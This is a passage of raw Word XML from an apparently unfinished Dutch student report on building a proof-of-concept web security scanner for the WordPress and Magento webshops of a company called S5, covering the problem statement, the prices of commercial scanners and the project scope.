        <w:t xml:space="preserve"> die zoals bijna elke website security kwetsbaarheden hebben. Hiervoor heeft S5 aanleiding genoeg om dit probleem te onderzoeken, omdat er altijd een kans is dat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van hun webshops wordt aangevallen door een cybercrimineel die uit </w:t>
      </w:r>
      <w:r w:rsidR="006F00A8">
        <w:t>is op het aanrichten van schade, gaf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S5</w:t>
      </w:r>
      <w:r w:rsidR="006F00A8">
        <w:t xml:space="preserve"> dit de motivatie om</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hiervoor voorzorgmaatregelingen </w:t>
      </w:r>
      <w:r w:rsidR="006F00A8">
        <w:t>te nemen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ik heb de opdracht gekregen om het probleem te onderzoek en een gepaste oplossing als aanbeveling te geven in de vorm van een </w:t>
      </w:r>
      <w:r w:rsidR="007E2066">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dat webshops op kwetsbaarheden scant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F682C46" w14:textId="18CB6661" w:rsidR="006822D8" w:rsidRPr="00DA758E" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc491022046"/>
      <w:r w:rsidRPr="00DA758E">
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Probleemstelling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00DA758E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A774DE0" w14:textId="46E23005" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">In recente onderzoek is gebleken dat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS systemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, een veelvoorkomende doelwit zijn voor hackers. Er zijn hier twee reden voor, 27% van alle website, wat een ongeveer 1 miljard is, wordt aangedreven door het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003C7827">
        <w:t>referentie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Dit betekent dat wanneer er een nieuwe kwetsbaarheid gevonden wordt dat, er meer dan 200 miljoen websites in gevaar lopen voor cyberaanvallen. De andere reden is dat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extensies gebruikt, deze worden ontwikkeld door derde partijen, sterker nog iedereen met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>PHP kennis</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zou een extensies maken en publiceren op de Extensie markt van zowel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>Het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marktaandeel van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is wel vele malen kleiner. 1,8% van de website die online staan worden aangedreven door de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Dit komt omdat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in een </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>nichemarkt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zit van webshops terwijl </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> voor bijna elke soort site gebruikt kan worden. Ook is gebleken uit onderzoek () dat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de meest voorkomende doelwit is voor hackers die het hebben gemunt op </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. De reden hiervoor is omdat webmasters hun </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS systeem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> niet naar de nieuwste versie updaten. Doordat er zoveel webmasters een verouderde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS systeem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gebruiken, met de kwetsbaarheden er nog in, kunnen hackers de webshop blijven hinderen met exploitaties. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF3590C" w14:textId="69A61A43" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Het zou ideaal zijn als webshop eigenaren in het specifiek de klanten van S5 inzicht zouden krijgen op de kwetsbaarheden van hun webshop. Informatie als de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS versie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, onveilige inputvelden, verlopen certificaten en misconfiguraties van de webserver/webshop kunnen de webshop eigenaren inzicht bieden in hoeverre hun webshop veilig is gesteld. Het eerste probleem waar al een oplossing voor is bedacht is, hoe kan S5 ervoor zorgen dat de webshop eigenaren inzichtelijke informatie kunnen verkrijgen over de beveiligingsstaat van hun webshop. De oplossing voor deze </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>vraagstelling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is ook tevens de aanleiding van mijn opdracht het onderzoeken en bouwen van een web security scanner wat zal moeten dienen als een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of Concept. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC16EC" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">De klanten van S5 zijn over het algemeen MKB-webshop ondernemers en doen daarom hun best om een goede klantenservice te bieden. Maar wat als een hacker er vandoor gaat met de klantgegevens heeft de webshop dan nog recht om klantenservice hoog in het vaandel te zetten? Wat kan hiertegen gedaan worden. In het algemeen kan een webshop eigenaar securitymaatregelingen nemen om de webshop beter te beveiligen. Hiervoor kan de webshop eigenaar contact opnemen met een cybersecurity bedrijf dat consultancy aanbiedt kan hoog in de kosten lopen. MKB-webshop hebben het al moeilijk genoeg. In een artikel dat door Frankwachting.com wordt vermeld dat de verwachting van klanten steeds hoger worden. De reden hiervoor is omdat reuzen zoals Wehkamp.com diensten kunnen leveren, diensten zoals gratis verzenden en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>same</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>day</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delivery, die MKB-bedrijven in financiële en logistieke opzicht lastig te realiseren zijn. Een web security scan kan in de duizenden euro’s lopen wat menig webshop eigenaren als een overbodige kostenpost zien en ik geef ze tot een bepaalde hoogte wel gelijk maar als een hacker jouw webshop in het vizier heeft dan is de vraag nog hoe veel schade er zal worden toe gericht. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F83559" w14:textId="53B36A8E" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">De website sectoolmarket.com, een vergelijking website voor web security scanners, heeft in 2016 een lijst gepubliceerd met informatie over de prijzen en features van de meeste gebruikte web security scanners. Ik heb </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">naar de 15 commerciële producten gekeken en daar de drie duurste uitgekozen. Ik heb tevens ook naar de open-source producten gekeken hiervan waren er 49, een zeer grote aanbod. Het probleem hiermee is dat zij zeer beperkt zijn in hun scan opties en niet specifiek zijn gericht op de doelgroep van S5. Ook is het meest zeer lastig om deze open-source producten in te richten in een test omgeving omdat er niet genoeg aandacht is besteed aan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>integratieproces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> oftewel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deployment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14237A77" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Bedrijven als IBM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netsparker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bieden de commerciële producten aan en hebben daarmee ook de hoogste kostenplaatje als het gaat om diensten/producten zoals consultancy en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enterprise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> applicaties maar in vergelijking met de open-source applicaties bieden zij meer features aan en zijn de applicaties veel accurater als het neer komt op het scannen naar kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1342"/>
        <w:gridCol w:w="3423"/>
        <w:gridCol w:w="2454"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="006822D8" w14:paraId="06280EBD" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="301DE6B2" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Commerciële producten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="69718CA2" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49CA147E" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68810993" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39594A82" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Prijs consultancy per jaar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318C2B9A" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Prijs applicatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="07B06147" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="442D0CF3" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>IBM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F56A7EA" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, XSS, file </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inclusion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A746320" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t xml:space="preserve">17700$ </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E0B6F0F" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="5CCA2244" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14909792" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A13670D" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, XSS, file </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inclusion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25651B3E" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>3500$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D2D1DF" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>2495$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="2A3DD749" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="519164C4" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Netsparker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D399C7" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, XSS, file </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inclusion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBF5AAF" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>3960$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7106BAEC" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>3960$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2178E68F" w14:textId="77777777" w:rsidR="006822D8" w:rsidRPr="009D389F" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="009D389F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Tabel 1.1.1 – commerciële producten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631CA07" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">In tabel 1.1.1 zie je hoe hoog de kosten kunnen zijn en open-source applicatie zijn over het algemeen gratis te gebruiken maar vergen veel technische kennis. Nu zou een webshop eigenaar een opensource applicatie kunnen aanschaffen maar, dan is de vraag nog of hij/zij instaat is om een succesvolle implementatie in de praktijk te brengen. Wat er hoogstwaarschijnlijk gaat gebeuren is dat er een expert wordt ingehuurd om alles op te zetten, ook dit kan hoge kosten opleveren. Een gratis web security scanner dat makkelijk te gebruiken is voor een bestaande klant van S5 zou ideaal zijn om de kostenpost van consultancy en dure licentie te omzeilen.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F202C5C" w14:textId="4D9071B6" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc491022047"/>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="005299A5" w14:textId="72716E68" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">Omdat ik mij zal </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>bezighouden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met het ontwikkelen van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Minimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Viable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Product (MVP) zal ik het project moeten afbakenen. Een Web Security Scanner kan zeer uitgebreide features bevatten. Voor </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scope van dit project heb ik een aantal onderwerpen bestudeerd zoals de </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> waar ik mee wil gaan werken, zeer belangrijk want dat vormt de basis van het project. De database die ik ga koppelen met de </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t>, op welke kwetsbaarheden ik ga scannen. Er zijn heel wat kwetsbaarheden die een website kan hebben, en er komen er nog elke week nieuwe bij die gelabeld worden als zero-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>day</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden. Voor meer inzicht in het probleem zal ik een aantal rapporten van grote bedrijven behandelen. Dit dient voor extra context die de lezer kan gebruiker om een </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>beter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inzicht te krijgen van het probleem. Om inzicht te krijgen in het proces van een scan zal ik een aantal bestaande scan applicatie testen om de resultaten te kunnen analyseren. Dit dient om mij meer informatie te geven over de werking van een web security scanner en wat ik nodig heb om er één zelf te bouwen. Weer omdat ik aan een MVP ga werken zal ik geen Dashboard applicatie maken waarin de gebruiker data visualisatie kan opvragen van scan sessies. Dit zou ideaal zijn maar niet haalbaar. Ik zal een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Console Interface maken. De Web Security Scanner zal de optie van een dasboard niet hebben en zal als optie voor toekomstige uitbreiding worden beschouwd. De Web Security Scanner zal enkel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mangento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> websites scannen, ik beperk het tot deze twee </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CMS platformen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> omdat S5 hiermee zijn webshop ontwikkeld en onderhoudt.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="006822D8" w14:paraId="69A409AE" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BDD08B5" w14:textId="22F86E59" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidR="00375881">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00375881">
              <w:t>/ verander scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="04C517E5" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55143F16" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Doelgroep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="6141E122" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18326B0F" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Kwetsbaarheden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="7D2750C2" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3766C884" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Rapporten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="3031D42B" w14:textId="77777777" w:rsidTr="00624219">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68521663" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Scanners</w:t>
            </w:r>
          </w:p>
